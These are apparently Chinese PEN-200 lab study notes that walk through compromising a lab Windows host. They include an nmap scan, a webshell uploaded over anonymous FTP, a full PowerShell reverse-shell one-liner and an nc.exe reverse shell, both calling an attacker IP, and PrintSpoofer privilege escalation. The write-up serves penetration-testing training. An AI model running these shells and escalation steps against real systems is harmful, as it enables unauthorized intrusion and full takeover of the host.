linux办公网
【pen200-lab】10.11.1.13
创始人
2024-03-05 05:05:19
0

pen200-lab 学习笔记

【pen200-lab】10.11.1.13

🔥系列专栏:pen200-lab
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月30日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

  • pen200-lab 学习笔记
    • 信息收集
    • 21
    • 4167

信息收集

nmap -p- --min-rate 10000 -A 10.11.1.13 

21/tcp    open  ftp                Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-07-19  10:25PM                 aspnet_client
| 04-07-19  07:14PM                99710 iis-85.png
|_04-07-19  07:14PM                  701 iisstart.htm
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2012 11.00.2100.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-07-18T21:05:29
|_Not valid after:  2052-07-18T21:05:29
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=disco
| Not valid before: 2022-07-17T05:26:00
|_Not valid after:  2023-01-16T05:26:00
4167/tcp  open  http               Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
5800/tcp  open  vnc-http           TightVNC (user: disco; VNC TCP port: 5900)
|_http-title: TightVNC desktop [disco]
5900/tcp  open  vnc                VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|     None (1)
|     Tight (16)
|   Tight auth subtypes: 
|     None
|_  WARNING: Server does not require authentication
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49152/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  msrpc              Microsoft Windows RPC
Aggressive OS guesses: Microsoft Windows Server 2016 (99%), Microsoft Windows 10 1607 (95%), Microsoft Windows Server 2012 (95%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (95%), Microsoft Windows Server 2012 R2 (95%), Microsoft Windows Server 2008 R2 (94%), Linux 2.6.39 (92%), Linux 3.10 - 3.16 (92%), Linux 4.0 (92%), Linux 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsHost script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-11-30T04:48:09
|_  start_date: 2022-07-18T21:05:24
| smb2-security-mode: 
|   302: 
|_    Message signing enabled but not requiredTRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   471.88 ms 192.168.119.1
2   472.05 ms 10.11.1.13OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 281.72 seconds

ftp可以匿名登陆
smb服务可以进行枚举
4167也存在web
开放了3389的危险端口
5800/tcp open vnc-http TightVNC (user: disco;
以及5900
5985可以进行winrm连接如果我有凭据的话

21

在这里插入图片描述
根据这两个文件名字,我认为这是一个web页面,所以我要找到一个存在iis欢迎页面的网页,他不是80,因为80打不开,当我找到这个页面,我就可以在ftp中上传webshell从而在浏览器中访问到webs hell,这就是我拿下第一个的思路

4167

在4167得到了我需要的iis欢迎页面
在这里插入图片描述
我们采用这个webshell,这是我见过最好用的

wget https://dl.packetstormsecurity.net/UNIX/penetration/aspxshell.aspx.txt --no-check-certificatemv aspxshell.aspx.txt aspxshell.aspx

在ftp中,put aspxshell.aspx

在这里插入图片描述而后访问
什么都可以干

http://10.11.1.13:4167/aspxshell.aspx

在这里插入图片描述
接着反弹一个shell、
因为考试要求不可以用webshell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.207',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

我们收到了shell
在这里插入图片描述我认为whoami /priv永远是提权第一步

whoami /priv

SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled

可以用各种土豆提权

但是这里挑选一个最简单的方式,利用的是SeImpersonatePrivilege

https://github.com/dievus/printspoofer

下载下来,然后传输过去
直接执行就行

printspoofer.exe -i -c cmd

但是到这里我发现ps环境不适应于我执行exe
所以我将转变一个反弹方式
在这里插入图片描述直接在这里上传一个nc.exe
而后反弹回来

nc.exe -e cmd.exe 192.168.119.207 8888

在这里插入图片描述
再执行

printspoofer.exe -i -c cmd

在这里插入图片描述where /R c:\ proof.txt
搜索最终flag地址

接下来一切都很简单了,这里不能泄漏最终旗帜
见谅

上一篇:POI实现Excel导入和导出(源码测试)

下一篇:【Java面试】异常常见面试题

相关内容

热门资讯

银河麒麟V10SP1高级服务器... 银河麒麟高级服务器操作系统简介: 银河麒麟高级服务器操作系统V10是针对企业级关键业务...
【NI Multisim 14...   目录 序言 一、工具栏 🍊1.“标准”工具栏 🍊 2.视图工具...
不能访问光猫的的管理页面 光猫是现代家庭宽带网络的重要组成部分,它可以提供高速稳定的网络连接。但是,有时候我们会遇到不能访问光...
Android|无法访问或保存... 这个问题可能是由于权限设置不正确导致的。您需要在应用程序清单文件中添加以下代码来请求适当的权限:此外...
AWSECS:访问外部网络时出... 如果您在AWS ECS中部署了应用程序,并且该应用程序需要访问外部网络,但是无法正常访问,可能是因为...
北信源内网安全管理卸载 北信源内网安全管理是一款网络安全管理软件,主要用于保护内网安全。在日常使用过程中,卸载该软件是一种常...
AWSElasticBeans... 在Dockerfile中手动配置nginx反向代理。例如,在Dockerfile中添加以下代码:FR...
AsusVivobook无法开... 首先,我们可以尝试重置BIOS(Basic Input/Output System)来解决这个问题。...
ASM贪吃蛇游戏-解决错误的问... 要解决ASM贪吃蛇游戏中的错误问题,你可以按照以下步骤进行:首先,确定错误的具体表现和问题所在。在贪...
​ToDesk 远程工具安装及... 目录 前言 ToDesk 优势 ToDesk 下载安装 ToDesk 功能展示 文件传输 设备链接 ...